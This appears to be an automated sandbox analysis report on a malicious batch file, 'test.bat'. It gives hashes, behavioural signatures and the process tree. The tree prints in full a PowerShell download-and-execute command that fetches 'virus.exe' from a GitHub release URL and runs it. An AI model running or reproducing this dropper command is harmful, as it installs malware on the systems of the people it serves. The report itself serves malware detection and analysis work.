Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 23:16
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win7-20240729-en
windows7-x64
4 signatures
150 seconds
General
-
Target
test.bat
-
Size
356B
-
MD5
0db6431e1e0b528c1003b75a3c10c0fb
-
SHA1
392315f341dffee2f2abaea389f171c55be0299e
-
SHA256
08715f8a4d0627387a6eb1294d90a936551cada622a8377592adbac9eba76ec6
-
SHA512
f5fd7505003070cbe2c37531137d9a800d5acbedf08bc638a9c54ed93bb41bb8f14a37f821e645bae2d39f9ad019033ba55ee3f69114a21fc132c19fa33f8a84
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe
Signatures
-
pid Process 2436 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2544 2592 cmd.exe 31 PID 2592 wrote to memory of 2544 2592 cmd.exe 31 PID 2592 wrote to memory of 2544 2592 cmd.exe 31 PID 2544 wrote to memory of 2436 2544 cmd.exe 32 PID 2544 wrote to memory of 2436 2544 cmd.exe 32 PID 2544 wrote to memory of 2436 2544 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\system32\cmd.execmd /k powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-